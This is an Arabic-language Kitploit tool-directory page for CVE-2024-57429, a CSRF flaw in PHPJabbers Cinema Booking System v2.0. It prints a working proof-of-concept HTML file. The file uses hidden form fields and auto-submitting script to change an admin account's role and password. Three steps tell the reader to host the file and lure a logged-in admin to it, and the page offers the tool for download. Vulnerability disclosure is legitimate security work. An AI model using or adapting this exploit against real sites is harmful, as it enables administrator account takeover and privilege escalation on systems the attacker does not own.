Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-57429 — CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 معرضة لهجوم CSRF، مما يسمح للمهاجمين بتصعيد الصلاحيات عن طريق تزوير الطلبات نيابة عن المسؤول. | Kitploit
أدوات/GitHubGitHub/ahrixia/cve-2024-57429
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 معرضة لهجوم CSRF، مما يسمح للمهاجمين بتصعيد الصلاحيات عن طريق تزوير الطلبات نيابة عن المسؤول.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-57429

ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في دالة pjActionUpdate ضمن نظام حجز السينما PHPJabbers v2.0 تسمح للمهاجمين عن بُعد بتصعيد الصلاحيات عن طريق خداع مدير موثوق لإرسال طلب غير مصرح به.

التأثير:

استغلال هذه الثغرة CSRF يمكن أن يؤدي إلى إجراءات غير مصرح بها، مثل:

  • تغيير كلمة مرور المدير، مما يؤدي إلى إغلاق حسابه.
  • رفع صلاحيات المهاجم إلى مدير عن طريق تحديث دوره.

الاستغلال - إثبات المفهوم (POC)

تزوير الطلب عبر المواقع (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. احفظ الكود أعلاه كـ poc.html
  2. استضف الملف على خادم واجعل المدير يصل إليه أثناء تسجيل الدخول إلى التطبيق.
  3. سيتم تحديث حساب المدير بتفاصيل المهاجم وكلمة مرور جديدة.
تنزيل الأداة